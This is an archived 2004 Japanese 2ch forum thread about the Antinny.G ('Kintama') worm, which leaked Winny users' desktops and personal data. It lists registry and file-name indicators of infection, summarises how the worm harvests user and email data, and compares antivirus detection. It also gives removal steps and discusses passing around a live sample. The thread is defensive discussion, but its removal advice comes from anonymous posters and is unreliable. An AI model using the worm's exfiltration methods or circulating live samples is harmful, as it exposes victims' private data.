俺が思うに安全だよー

怪しいファイル名ってのまとめてあげるよ

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
ここまでは既出の情報ですが何が怪しいかのまとめです

まずレジのデータからいきます
"C:\Program Files\{FOLDER}\{FILE}.exe" /logonなど
start,startup,login,autorun
などのどれかがあれば(･∀･)ｺﾝﾆﾁﾊ!?

次は{FOLDER}と{FILE}の部分に注目
{FILE} = ●
って感じで●に関しては以下のどれか
autorun
svchost
spoolsv
WINLOGON
explorer
System
quickboot
{FOLDER} + cfg
{FOLDER} + config
{FOLDER} + start
{FOLDER} + login
{FOLDER} + setup
{FOLDER} + env
{FOLDER} + loader

レジの名前の部分は
ara-keyの場合もあるしexeのファイル名似の場合もある

naonaoの12日の画像に21:21:06と21:25:14があるから
間隔は4分8秒＝252秒
最低でもこれくらいのｲﾝﾀｰﾊﾞﾙがあるってこった
亜種はしらね(*'ω')

ごめ248秒だね(´･ω･`)

nyのシステム情報みて
キャッシュが０、ＵＰファイル数が0
upフォルダ数が１（ＢＢＳフォルダ）だったら
現状では感染は不確かだとしても、1００％「晒しあげられてはいない」と思ってよいのでしょうか？

549 名前:[名無し]さん(bin+cue).rar 投稿日:04/02/23 20:35 ID:kNK6RjB5

PC再インスコして、autorun切るのすれてて、「Autorunを切ってないような初心者は少し痛い目を見てください。 Version 2」
っつーのに引っかかってしまいますた。。。


↑これはどういうこと？ただ再インスコするのではだめなのでしょうか？？

Kerio4ならキンタマウイルスに感染しないぞ！！
http://www.kerio.com/kpf_appintegrity.html

☆彡Kerio Personal Firewall 2.1.5　Rule 14☆彡
http://pc.2ch.net/test/read.cgi/sec/1075173212/294-300

　　　　　　 　　　　　　/ヽ　　　　　　　/ヽ
　　　　　　　　　　　　/　 ヽ　　　　　 /　ヽ
　　＿＿＿＿＿＿ /U　　ヽ＿＿＿/　　ヽ
　　|　＿＿＿＿　／,,　　　U　　,,　:::::::::::U:＼
　　| |きんたま　/《;.･;》＿__　《;.･;》 　::::::::::::::|
　　| |きんたま　|　　　|　　 |　　　　　U :::::::::::| 　・・・
　　| |きんたま　|U　　|　　　|　　　　　　::::U::::|
　　| |きんたま　.|　　├―-┤　U...:::::::::::::::::/
　　| |＿＿＿＿　ヽ　　　　　.....::::::::::::::::::::::<
　 └＿＿＿／￣￣　　　　　　::::::::::::::::::::::::|
　　|＼　　　 |　　　　　　　　　　　::::::::::::::::::::::|
　　＼ ＼　 ＼＿＿＿　　　　　 :::::::::::::::::::::::::|

>>311
ありがとうございました＾＾

キンタマの亜種は複数確認されているぞ。
1から全部嫁。

どなたか>>315
について見解お願い申し上げます
とりあえず一番怖いのは晒しアゲなので
それさえないのであれば万が一（そのほかの症状もいっさいないので）感染していたとしても
それは自助努力で何とかします。

*.exe で検索かけて、フォルダアイコンとメモ帳アイコンのexeファイルを削除
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 以下の該当するレジストリも削除

これでいいんじゃない？

http://canon-sol.jp/product/nd/virusupd/ で、パターン1.683で「Win32/HLLW.Antinny.C」とあるが、
これはNOD32がキンタマウイルスに対応したと考えてよろしいか？

>>321
何とも言えないね。
被参照量が一定以上になったらキャッシュとUPフォルダ消すっていう
変種がでてないという可能性もないし。
ご愁傷様。

>>321
もし晒しあげられたら、手の打ちようが無いのだから、今更ジタバタするな。

晒されると何が困るんですか？
怖い怖い言ってる奴ほどどうでもいいんだがな、実際。

つか、今ｎｙ自体で実際に流れてるファイルって
捏造含めてもそう種類ないだろ。
２ｃｈ発のｎｙだからスレに報告が多いだけで
ニュー速の祭りや二次感染で自爆した人以外は
実際はそんなに知らずにかかる人居なかったんじゃないの？

感染してる可能性のある奴は逝っとけ
http://www.freepe.com/ii.cgi?appli

いま試しに、ファイル・フォルダの検索でWinnyって入れてみたら

　　　　　　キンタマの文字が

うぎゃーーーーーーーー

って、落ち着いてよく見たら、お気に入りに入れてたまとめサイトでした。
死ぬかと思った（古

>>328
は？

>>323
とりあえずexeには対応したみたいだけど、htmlやjpgに偽装してあるのにはまだみたい

html偽造ってなんだ、ボケか？
あれはAntinny.Gを起動させるただのActiveXなんだからAntinny.Gとして検出しないのは当たり前だろが

jpgに偽装っていうのも初耳w
拡張子偽装かアイコン偽装のことかな？

>>333
埋め込み偽造だろ？
WEB割れ時代(少なくとも5年前)のものだから知らない香具師が多いだろうな

マイドキュメントの中のファイルも根こそぎ流されるの？
そしたら何十ギガの容量になるが･･･

>>335
いくつかピックアップしてだろ

nortonでスキャンしたらAntinny1000個以上見つかったんだけど、なんでだろ？？
upfolderのzipやキャッシュに埋め込まれてたってことかな？

パソコンのユーザー名ってどうやって変更すればいいの？

>>334
それは知ってるけど
>>331は、jpg　　　　　　　　　　　　　　　　　　　　　　　　　　　　　.exe
をjpg偽造とか言ってんじゃねーの？

>>339
それって結局exeじゃ

>>340
だから、>>331はjpg偽造を理解してないんじゃねーの
ということ

ってか説明サイトの説明じゃ全然わからん
とりあえずウィルスに引っかかったら、定期的にデスクトップの画像（＋デスクトップに
置いてある全ファイル）がwinnyで流されるってことか？

あーもう、偽装だっての。not偽造!!
Web割れとか吹く前に、出直して来いヴォケ!!

マックでjpgインプランター（？）だかってあるじゃん？
それでキンタマ分割できる？
おしえてマックの人。

>>344
意味不明

わけわからん…インプラントJPGは窓にもあるけど、
それでJPGに埋め込んでから分割しようっていうんか？？
分割したいだけならほかにいくらでもあると思うが…。

キンタマウイルスをMeltIt!に食わせてみるといいだろ。

W32.HLLW.Antinny.Gってなんか響きがカッコいいな

まぁキンタマだけどな

>>348
確かに「.G」はｶｺｲｲ。
「砂の器.G」とか「29歳で童貞.G」とか「広島の方のキムタク.G」とか。

>>369
Kenny.Gも追加

>>369
追加よろしく

>>334
ウィルスをインプラントｊｐｇに埋め込んでなんか意味があるだろうか？
exeファイル埋め込んだｊｐｇクリックしたところで拡張子がｊｐｇである以上
画像ｳﾞｭｰﾜｰが起動するだけでｳｲﾙｽ起動しないよな？

ｊｐｇの中に埋め込んだｅｘｅファイルが、埋め込んだままの状態で動作する
インプラントｊｐｇなんてあったっけ？

>>353
(･∀･)ｺﾝﾆﾁﾊ!!.jpg　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　.exe

インプラントなんて言い出したWEB割れ時代のジジイがアホなだけ。
この場合の偽装とはアイコンを画像とかフォルダらしくして拡張子の前に長い空白を入れたりしたただのexe。

>>355
むやみにジジイだのアホだの言う前に、話の流れを理解しなはれ。
>>331 はどう説明するの？

デマ・誤解

ラップしてあんだろ？
そういや昔サランラップってソフトもあったな

混乱させて申し訳ない。素人の戯言だとおもっていただければ・・・
このあたりを見てもらうをみてもらうとして
http://tmp2.2ch.net/test/read.cgi/download/1079588685/404-440
で、NODでスキャンしたらReadMe.exeにのみ反応して、htmlやP47.jpgには反応しなかったということ

違うタイプのトロイとか出たらまた引っかかるなこういうタイプは。

>>356
話の流れ（素人の戯れ言）よりも論理を理解せよ

NODが偽装拡張子にだまされたってことか

全然違うと思う

じゃあ俺の右斜め45度に騙されたんだな

>>331
当たり前だろ、活動出来る形式じゃないし。
html踏んで感染するってのは、
htmlの記述中に実行形式のファイルを読み込ませるトラップが有るって事だ。
.jpgにしても実行出来ないから反応しないよ。
.jpg .exeみたいなので感染するんじゃねぇのか？

NOD32のアンチウィルスソフトに対する考え方は「ウィルスの実行を阻止しつつ常駐検査の負荷を最小限度とした快適な環境を築く」というものだ。
拡張子が変更されていれば検査する必要なしとの見解を持っている。
これらは快適な環境とのトレードオフとして位置付けられる。

NHK総合　3月23日(火)放送予定
違法コピーがネットを駆け巡る(仮題）
ttp://www.nhk.or.jp/gendai/yotei.htm

※実況は実況板で

初心者でよくわからないんですが、
田中のキンタマは一つしかないって本当ですか？
厨な質問でごめんなさい。

キはキンタマのキ

>>365
ということはHtmlやフォルダに偽装したファイル（これ自体はウィルスじゃない）とｷﾝﾀﾏexeの二つに別れてるってこと？

>>370
> ということはHtmlやフォルダに偽装したファイル（これ自体はウィルスじゃない）とｷﾝﾀﾏexeの二つに別れてるってこと？

まぁ、そういうことかな。
配布形態はキンタマ本体（実行ファイル）だけの場合もあるようだけど。

さいきんこのウィルス？の名前をよく聞くから気になってこのスレを見たんだけど
このウィルスってwinnyってのを使ってなければ実害は無いってこと？

はははは。同じ質問質問何回すれば気が済むんだよ。

winnyが入ってない場合はどういう挙動するんだろう
UPフォルダが無くてもSS保存したりするんかな

はははは。誤字だよ。

お前らなんか所詮キンタマなんだよバーカ！！

>>371
ｷﾝﾀﾏ本体のみで踏む確率は低そうだが、実行命令のフォルダやHtmlに偽装されるとうっかり踏んでしまうことも多そうだ。
手の込んだウィルスを作ったもんでつね。

●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●

Kerio4　http://www.kerio.com/kpf_appintegrity.html　なら
Winny媒介のキンタマウイルス
http://securityresponse.symantec.com/avcenter/venc/data/w32.hllw.antinny.g.html
に感染しない

Sygate・Zone Alarmには似たような機能があるが防げない。
Outpost・Kerio2・ノートン・バスター・マカフィーに至っては類似機能もない。

●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●

こんなのが大流行したら女子アナはニュースを読めないじゃないか

(･∀･)ｺﾝﾆﾁﾊ!!.jpg　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　.exe
↑みたいな場合だと拡張子表示の方がかえって引っかかるかも
拡張子非表示の場合、表示されないはずの拡張子が表示されてるように
見えるから一発で判っちゃう。
とは言え拡張子非表示にしてるとﾌｫﾙﾀﾞｱｲｺﾝ偽装ﾌｧｲﾙとかにやられちゃう可能瀬が
高くなるから、どっちにしても注意するしかないか。
色々考えるもんだなホント。

>>378
どうみてもその機能じゃ感染は防げない

ていうか、拡張子表示しないなんて、ﾁｮｿしかしないでしょ。

アイコンが変わるViewer使えばOKか？

・落としたもの中には悪意の存在の可能性があるということを忘れない。
・そもそも不審な所からはDownloadしない。

これだけよ。

キンタマの詰め合わせを頂いたんですが、exeとして実行しなければ、
つまりtxtファイルとしてエディタで開くのであれば感染しませんか？

本物かどうか確かめてみたいんですが。

W32.HLLW.Antinny.G（日本語版）
http://www.symantec.com/region/jp/sarcj/data/w/w32.hllw.antinny.g.html

ノートン先生インスコしてからためせ

>>385
質問の答えとしてはyesだが、それを自分で判断できないようでは
危険なプログラムを扱う為の知識が足りてないと思う。

>>385
それすら判らない素人が確認する必要は無いだろう？
危ないだけだから止めておけ。
基礎知識をしっかりと学んでから手を出すべきだ。

ちなみに答えは、感染しない。

>>386
つい藁たのが、「ダメージ：高」

確かに、精神的ダメージが高いわな

キンタマﾀﾞﾗｰﾝ

ノートンがぬるぽだかキンタマ検出して削除した後なんだけど
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
のなかに
Lhaca CFG
C:\Program Files\Lhaca\Lhaca_cfg
ってのがあった場合ｺﾝﾆﾁﾜ!でしたか？

ｺﾝﾆﾁﾊ(・∀・)!!

... regedit.exeを復元するには？

>>394
regedit.exeを上書きする

トレンドマイクロって、まだキンタマ未対応ですか？

キンタマ駆除してもフォルダには残ってんだろうからそれ知らずに延々上げ続ける奴いるのかな。

>>396
バスタースレ見たらどうだ？

>>396
CRC16:E837 のオリジナル(?)にすら未対応
全く、日本に解析チームがあるんじゃなかったんかいな

ちなみに、eTrustはいつの間にかE837には対応してました

リアルの知り合いでキンタマに感染した人いないよ。
こんな糞ウィルスに対応する暇あったら他のやつに力注いでほしい。

感染するのはワレザ、かつ厨房だけだからな

＋俺だけは絶対大丈夫と思っている香具師

Antinny.G の 'G' は Gold の 'G''

>>402
ガンダムのGにきまってる！

ocn.OTL ←じっと見てると幼女の股間を覗きこんでいるように（ｒｙ

シマンテックのAntiny.Gについての解説文に

7.　レジストリから組織名、使用者名、E-mailアドレスを抜き出して、
　　これらを用いてテキストファイルを作る
10. 7で生成した情報を入れたzipかｌｚｈのアーカイブをつくり、
　　upロードフォルダにこれを置く

と書いてあるんだけど、これは組織名、使用者名だけじゃなく自分のE-mailアドレスまで
レジストリから探してきて、winnyに晒すってこと？
キンタマファイルの名前に組織名、使用者名が付くことは周知のことだけど、
E-mailアドレスはどこに晒されてるの？
キンタマに感染して、zipかｌｚｈのファイル詰め合わせをwinnyに晒されたら、必ず
自分のE-mailアドレスまで晒されてるってこと？もしそうだったらガクブルなんだけど。
使用者名に本名使ってなくても、E-mailアドレスがばれてたら、警察はすぐ身元特定可能じゃん。
だれか有識者の方お願いします。

>>405
まずは正規ライセンス買ってからだ

そういやダウソ板のウイルス専用スレで、
キンタマ流出者がとうとうメール３通も来た…とか
いってたような。
あれは例のTEMPフォルダに出来る告発定型文が
zipに入れられてまかれてたってことなのか？

ダウソ厨は来んなって。毎晩震えて眠っとけや（ｹﾞﾗﾌﾟ

何の気なしにregedit.exeで検索したらいっぱい出てきた。
なんだこれ？
なぜ My Pictures だの My eBooks だのに regedit.exe が入ってるんだ？

>>409
サイズとCRCみてみたら？
上の方で解析さんが出してる情報とあてはまるかどうか

>410
一応違うみたい。でも気味が悪いな。
拡張子のついてない160〜280KBのファイルもぞろぞろ出てきた。
全部消しとこう。

>>409
regedit上書きされた奴らの呪いだと思われ

((((；ﾟДﾟ))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ

どうやら下火になってきたようだ。
naoが最大の被害者ってことで。
終了・・・か？

>>414
キンタマ最大の自業自得

>>399

トレンドマイクロもWORM_ANTINNY.BとCで対応してるようだが。
ちなみに踏んで実験済み。
Symantecより発見早くないか？

http://www.trendmicro.co.jp/vinfo/virusencyclo/default2.asp?m=q&virus=antinny&alt=antinny

ANTINNY.B、Cはキンタマじゃないんでしょ？

>>417
全然違うワーム。>>416が勘違いしているだけ。

>>418
バスターまだ対応してないの?

>>416
プ

アンチニーげーにて呼応

>>419
16bitCRCがE837のキンタマの原種を持ってるけど、最新パターンファイル833＋
最新検索エンジン7.000でスキャンしても反応しないよ。

ちなみに、この前ノートン先生を入れて試した結果、「W32.HLLW.Antinny」として検出した。

ノートン先生で試した当時はまだノートン先生もキンタマは暫定的な対応で、ぬるぽ（Antinny.A）と同じ
「W32.HLLW.Antinny」として検出していた。

AntiWhiterで防げる
ttp://jbbs.shitaraba.com/bbs/read.cgi/computer/1449/1066481483/115-

http://www.trendmicro.com/ftp/products/pattern/cpr/whatsnew.txt

Pattern: 834
Version: 04
Release Type: Control Release
Notes:

March 23, 2004 02:53:14 (GMT -08:00)

---------------------
New Virus Detected:
---------------------


There is [38] new virus detected by the pattern file.
All detail virus names please refer to the list below.

BKDR_ASSASIN.20A

〜中略〜

WORM_AGOBOT.VA
WORM_ANTINNY.G ← ！！！
WORM_RBOT.D

>>422
情報ありがとうー
しかし なんでこんなに対応が悪いんだろうね
シマンはある程度対応したみたいなのにね
対応したくない理由でもあるのかね
今度は新種のウイルスへの対応の速さで
製品選別しないと駄目かもしれんな

ウイルスバスター2004に、>>425のControlled Pattern Release 1.834.04をインストールして
キンタマ原種をスキャン。
見事にWORM_ANTINNY.Gとして検出したよ。

>>425
！！！

>>426
>対応したくない理由でもあるのかね

「なんで俺たちが、コソ泥どもの安全を守ってやらなきゃならんの？」
きっとそう思ってるだろうな。アンチウィルスソフトを作ってる人たちは。

あれか、交通違反が多い人には車は売りませんっていうのと同じか

>>429
単にウイルス解析能力が低いだけだよ

個人でｎｙやってキンタマ引っかかってる分にはいいが、
企業でｺｿｰﾘｎｙをやってる香具師が結構いる現状からいったら
対応してもらわないとちょっとまずいだろ。
企業秘密のファイルが漏れたり、
得意先に会社のメアドで変なメールが届いたり・・・

>>429
どう思ってても構わないが、ソフトの購入者が支払った対価分の仕事はしてもらう必要がある。

>>429
技術がないだけだと思われ

あのーマカフィーは？

>>435
キンタマです

>>435
なにそれ

キンタマの次に悪質=マカフィー

>>432
会社でやってる時点で・・・
やっぱｎｙ使用者としては大きく出れないよ

>>429
nyもウィルスと認定すれば解決

ANTINNY.G　NAV2003とシマンテックオンラインスキャンでは検出したが
バスター2004とチェイサーでは検出せず
バスターはANTINNY.Cは検出したがチェイサーはだめぽ・・・

迂闊にも踏んでしまったが、>>33師の情報を参考にして駆除成功。
具体的には、Program Files を 作成日時：2004/03/24（今日） の条件で検索して発見しました。

[本体]
ファイル：C:\Program Files\KISS\kissautorun.exe
タイムスタンプ：1980/07/07 9:03
サイズ：376,832
CRC16：A1E7

[レジストリ]
キー：HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
値：kissautorun
データ："C:\Program Files\KISS\kissautorun.exe" /start


さて寝るか……

もしかしてこのウィルス（って呼んでいいのかしらんが）は Winny 撲滅団体がばら撒いた
エージェントなのか？

撲滅どころか、他人のデスクトップを見たいが為に
新たにwinny導入した人も結構いそうな

NTFSでドライブを暗号化してても意味ないのかね？
流出しても相手が読めなきゃ意味ないような…。

ウイルスってのは正規の利用者が操作したようにOSをごまかすプログラムなので
ムダのムダムダです

バスター対応済み

>447 おなじくバスターでのキンタマ検出確認。

バスターやっと対応か。トレンドマイクロ対応遅すぎ。トレンドに乗り遅れたね。

今回は許してやるが、次はないと思え＞トレンドマイクロ

>>445
釣り？

で、マカフ（

ｷﾀ━━━( ﾟ∀ﾟ )━(∀ﾟ　)━(ﾟ　　)━(　　)━(　　ﾟ)━(　ﾟ∀)━( ﾟ∀ﾟ )━━━!!!!

ネットに火災報告書流出　消防署員のパソコンから
http://www.excite.co.jp/News/society/20040324113203/Kyodo_20040324a465010s20040324113209.html

バスターは糞

>>454
「日本語版用パッチは準備中」，LiveUpdateでも解消されない「Norton Internet Security」などのセキュリティ・ホール
ttp://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040323/141850/

Norton Internet Securityの脆弱性修正パッチは4月に、回避策もなし
ttp://japan.cnet.com/news/sec/story/0,2000050480,20065048,00.htm

トレンドマイクロオンラインスキャンでWORM_ANTINNY.Gとして検出確認。
で、我が家のマカフ（ｒｙ

>>453
あはははは。

>>455
>>454はウイルスバスタースレで低能ぶりを曝け出してバスター叩きに転じたｱﾌｫ。

Symantec Norton Internet Security/Norton AntiSpam にリモートアクセスの脆弱性
ttp://www.symantec.co.jp/region/jp/sarcj/security/content/2004.03.19.html

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

Kerio4　http://www.kerio.com/kpf_appintegrity.html　なら
・キンタマウイルス　http://www.symantec.com/region/jp/sarcj/data/w/w32.hllw.antinny.g.html
　による被害を防げる
・現時点では日本語化できない
・Kerio2よりはわかりやすい
・Outpostなみに軽い
http://pc2.2ch.net/test/read.cgi/win/1077780039/233

Sygate・Zone Alarmには似たような機能があるが防げない。
Outpost・Kerio2・ノートン・バスター・マカフィーに至っては類似機能もない。

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

ノートンがキンタマに対応したのは04/03/20 15:40。
http://pc.2ch.net/test/read.cgi/sec/1078999652/417

ウイルスバスターがUpdateで対応したのは3日半以上遅れの、04/03/24 07:26。
http://pc3.2ch.net/test/read.cgi/sec/1079583417/846

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

対応が遅いバスターもどうかと思うが、セキュリティーホールがあるセキュリティーソフトって…

Norton Internet Securityに脆弱性
ttp://www.itmedia.co.jp/enterprise/0403/21/epc09.html

トレンドも名前を WORM_ANTINNY.K にしてくれたら良かったのに。

キンタマにかかった火災報告書ってどれよ？
http://ex4.2ch.net/test/read.cgi/news/1080098552/
燃料ｷﾀ━━━━━━(ﾟ∀ﾟ)━━━━━━ !!

>>463
いや、WORM_ANTINNY.G の G は Golden Ball の G

お前らいい加減にしろ高卒ども、ん？
ぶち切れるぞ、てめーら速く止めるんだ。
あかんかな。こんな糞スレで喜んでる馬鹿共に何を言っても
いちいちレスするのも馬鹿らしいことだな。２ちゃんの
糞ドキュン共は他者を叩くのが御似合いだよ　　　　　
憐れむ心を持ってない地球上のクズ共の集まりだもんな。

シマンテックは、同社のウイルス対策製品「Norton Internet Security 2004」や
「Norton AntiSpam 2004」に、WebサイトやHTMLメールを閲覧しただけで任意の
コードが実行可能な脆弱性を発見したと発表した。

ttp://internet.watch.impress.co.jp/cda/news/2004/03/23/2522.html
ttp://bb.watch.impress.co.jp/cda/news/4706.html

　　　　　　　　　　　　　,ィ⊃　　, -- ､
　 　 ,r─-､ 　 　 　,. ' ／ 　　,/ 　 　 }
　 　{ 　 　　ヽ 　／ ∠ ､＿__/　　　　|
　 　ヽ.　 　 　 V-─- 、 　, ',_ヽ / 　,'
　 　 　ヽ 　ヾ､　　',ﾆ､ ヽ_/ ｒｭ､ ﾞ､　/
　　　　　＼　 l　　ﾄこ,! 　　{`-'} 　Y　　　無職以外は
　 　　　　　ヽj 　　'ー'' ⊆) '⌒｀ 　!　　　　　オムツ穿くといいよ♪
　 　 　 　　　l 　 　　ﾍ‐--‐ｹ　　　}
　 　 　 　　　ヽ. 　 　　ﾞ<‐y′ 　 /
　 　 　 (ヽ､＿_,.ゝ､＿ 　~ 　___,ノ ,-､
　 　 　　） 　 　 　 　 　　ﾉ/｀'ー-'　<
　　　　ｒ'／, 　　_..　　　//　　ｌ、、､ヽ_)
　 　 　 ゝ(_/_ﾉ´ /ヽ_ノ/　　__,ｌ ヽ)_)‐'
　　　　　　　　　{｀ ｰﾆ[二]‐ｸ′
　 　 　 　　　　　〉 　　/ 　/＿
　 　　　　　　　/ 　　´￣｀ヽ 　）
　 　 　 　 　　（＿＿＿＿ノ--'

>>466
お　　　高　　　　ん

渾身の一作ってか。コピペとはイタイ。

>>465
！？　そうだったのか＿|￣|○
やるなトレンドマイクロ。

>>469
コピペなんだ？
ちょっと関心したのに。

( ﾟдﾟ)､ﾍﾟｯ

>>471
http://ex4.2ch.net/test/read.cgi/news/1079970082/461

トレンドマイクロもｷﾀ━━━━━━(ﾟ∀ﾟ)━━━━━━ !!
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_ANTINNY.G

( ﾟ,_･･ﾟ)

たまにkerioの宣伝してるのは何者?
そんなもんで防げるわけ無いだろうに

>>475
キンタマにはケリオが効く気がしないか？

>>475.
…DL板の解析を読んでいないのか…
亜種に気をつけてがんばれな。もう何も言わないから。

感染と流出を分けて考えるところがいかにも（ｒｙ

>>477
スタートアップへの登録に対して警告が出るくらいでしょ?
そんなのが有効な対策なの?

>>476
そう言われるとそんな気がする。

ｷﾝﾀﾏはそれ自体通信しないから実行時にファイアウォールは反応しないだろ。
ファイルばらまくのもny経由だし、nyはファイアウォールに許可されてるわけなので素通り。
Kerio4のトロイ検知機能とやらも、ｷﾝﾀﾏがnyを起動したり改変したりするわけじゃないので
意味ないだろ。

FWでなくて、プログラムの実行制限機能があるからそれで防げる。という意味だと。

未知のプログラムを実行しようとすると必ず警告が出るから
そこで許可さえしなければ、プログラムが実行される事はない。

ただ他の幾つかのPFWにも同様の機能はあるし、単体でそういうソフトもある。
Kerio住民も厨の流入はあまり好ましく思ってないので
たぶんコピペ厨は宣伝でなくて嫌がらせのつもりなんだろう。
なのであまり反応しないように。

有料ソフトは糞ばっか

rtsp://mm1.rai.it/raisport/04feb/20040220spo17jalazio_04-raisport-f6.rm

↑激しく誤爆・・・

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

Kerio4　http://www.kerio.com/kpf_appintegrity.html　なら
・キンタマウイルス　http://www.symantec.com/region/jp/sarcj/data/w/w32.hllw.antinny.g.html
　による被害を防げる
http://pc3.2ch.net/test/read.cgi/sec/1079605894/481
・現時点では日本語化できない
・Kerio2よりはわかりやすい
・Outpostなみに軽い
http://pc2.2ch.net/test/read.cgi/win/1077780039/233

Sygate・Zone Alarmには似たような機能があるが防げない。
Outpost・Kerio2・ノートン・バスター・マカフィーに至っては類似機能もない。

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

ノートンがキンタマに対応したのは04/03/20 15:40。
http://pc.2ch.net/test/read.cgi/sec/1078999652/417

ウイルスバスターがUpdateで対応したのは3日半以上遅れの、04/03/24 07:26。
http://pc3.2ch.net/test/read.cgi/sec/1079583417/846

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

>>485
ｵﾏｴうざい

>>485
kerioスレで意地悪でもされたか？
ここまでくると痛すぎるよおまい
リアルでキンタマ痛いとかか？

>>33-34みたいな現象に一個も当てはまってないんだけど
c:\windows\temp 配下に DWHFXXX.tmp てのがボロボロできて
ノートンさんには W32.HLLW.Antinny て言われてます。

これってなに？

これって単純にデスクトップに何も置かなければいいの？

>>489
整理整頓できない奴はフィリピンバーの姉ちゃん
と撮ったプリクラと個人情報がいっぱい詰まった会社の重要書類が
ごっちゃになって机の上に散らばってたりするだろ。
普通は見られたくないもんは引き出しに入れて鍵掛けておくもんだべ。

つーか普通デスクトップにショートカット以外のデータって置いとく？

>>491
ごく稀に一時的に置くことはある。
けど常時はない。

つか、ﾏｲﾄﾞｷｭﾒﾝﾄうｐされたら((( ；ﾟДﾟ)))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ

>>481
なんかあちこちに貼ってあるなと思ったら
それか

マイドキュメントのアップロードバージョンも近いうちに登場しそうだな。
っつーかウイルスをうまく作って、PC内の特定の名前のフォルダに入っているファイルだけアップする
とかになったらいくらでも裁判で言い逃れできそう(w　Antinny.G が勝手にやったんです(:_;)ってさ。

ウィルスが勝手にやったってばら撒いたことの責任は逃れられないっての。

DoS攻撃の容疑で裁判にかかったやつが、攻撃は自分の意志ではなく
たまたま感染してたウイルスが勝手にやったことだという主張をして
認められたってことなかったっけ？
うろ覚えでしかも外国の話だったはずなので関係ないかもしれんが

デスクトップに「マイ　ピクチャ」フォルダが置いてあるんですけど、
その中身も圧縮キンタマになるんでしょうか？

マイピクチャ＞日付フォルダ＞jpgファイル
という感じなんですが。

どこまでが圧縮されるのか、教えて下さい。

業務上過失漏洩

>>497
わかりました。次バージョンではそれらもUPされるように改良しますね。

>>499
Σ（´Д｀ｽﾞｶﾞｰﾝ

notepadになったregedit.exeって直せないんでしょうか・・・

いったい何人引っ掛かってんだ？知られてから相当に日が経ってんぞ

初心者がユーザー名を変えるには再インストールしかないのですか？
再インストールする時にメールアドレスを取得しなければ　勝手にウィルス
によってメールを送られる心配はないのですか？再インストールすれば
ユーザー名も変えられるメールも勝手に送られないしもうキンタマによって
個人情報が漏れない？誰か教えて下さいＴＯＴ高速で早くしごきたいＴＯＴ

>>503
市役所行って変更手続きしてこい。

>>503
自業自得
ざまーみろ

今更AntinnyA入りのファイル持ってたことに気づいた＿|￣|○
笑え笑え｡･ﾟ･(ﾉД`)･ﾟ･｡
まぁ特に被害無いし他と比べれば全然ましだったが。

よし、じゃぁ笑う

'`,､'`,､'`,､'`,､'`,､(ﾉ∀`)'`,､'`,､'`,､'`,､'`,､

初心者はｎｙをやめろ。
車を市街地で無免許運転してるようなものだ。

>>503
とりあえず再インストールすれば全部消えるがnyで落した怪しいデータも全部破棄しとけ。
こうしてみるとキンタマは
大規模P2Pﾃﾞｽｸﾄｯﾌﾟ晒し+ﾃﾞｽｸﾄｯﾌﾟﾌｧｲﾙ共有＋初心者撲滅ソフトになったな。
　　　　　　　　 ┏━━ω━━┓
　　　　　　　　 ω　きんたま　ω
　　　　　　　　 ┗━━ω━━┛

ny自体は持ってないけど…感染していたら怖いなぁ。
これ、非nyユーザーが感染した場合はどうなるの？

これってny以外に感染経路あるのか？

友人がnyで入手してきたファイルとかね

>>511
どこかにうｐされて、2chに貼られてたら感染することはありえるだろ。
メールでばらまくという噂もあるし。

クリックミスで感染して、激しく対処し、詰め合わせ及びscreen shotも撮らないように出来たんだが…

regedit.exeが直らん。消してもメモ帳の状態で復活するし、最新のウイルス定義でも引っかからんし…
まあ他の高機能レジストリエディタを使えば済むんだけどね。

>>514
それって直ってるの？

しかし、こういったスレを見ながら作者は次のバージョンを
考えているのかな。
Delphi製っぽいレスがあったけど、とすると自己再組立は少し難しいかもね。

>>514
system32\dllcacheにあるregedit.exeとregedt32.exeを消せ
まずはそれからだ

>>516
うほっ良い男。メモ帳regedit再生しなくなった！マリガトウ

ってかわざわざWindowsのCD使ってregedit.exeだけのためにinstallし直さなきゃいけないのかよ、面倒くせぇ…
regedit.exe置いてあるところなんて無さそうだしな。OSについてるregedi.exetやめてシェアソフトのFREGEDITをregedit.exeとして動かすかな〜…

あ、ちっくしょ！
FREGEDIT.exeをdllcacheに置いて実行したら読み込み違反起きやがった！
やっぱり純システムファイルじゃないとだめか…く、くやしか！悔しか(つД｀)

>>517
いやいや、セーフモードで起動して
CDのregedit.exeをdllcacheに置けばｲｲじゃん。
あとはOSが勝手にsystem32のregedit.exeを修復するでしょ

CRCがEB76のキンタマが出てきたんだけど
これって新種？

>>520
>CRC16:E837　　本体？デスクトップうp型？　（ノートン対応済み）
>CRC16:57E0　　亜種？My Documen うｐ型？
>CRC16:CFB7　 亜種？

実行してみてキンタマだとわかったの？

>>521
実行はしてないけどバイナリで見た感じではキンタマっぽい
一応残してあるので後からうpしてもいいけど

うｐはまずいんじゃ・・・
かといってnyだと誤爆がありそうだし
パス付きzipで放流希望

>>517
サービスパック入れてれば
ServicePackFiles\i386
にあるはず
逆にインストールCDだと、regedit.exeのバージョンが古い可能性もあり得る
まあ、古いバージョンでも無問題と思うが

>>523
拡張子をtxtにすれば無問題では？

>>525
これなんだという事で極窓でも使われた日には・・・・
やっぱりパス付きzipが妥当だろうよ。
知らない人間が拾っても判らなくしないとまずいだろ？
パスは長ったらしい全角ならOKでは？

>>516-519
system32にあるregeditとregedt32を消した後
WINDOWSにあるregedit.exeを消したら
元の正常なregedit.exeが復活したんですが？
これはこれでいいんでしょうか・・・。

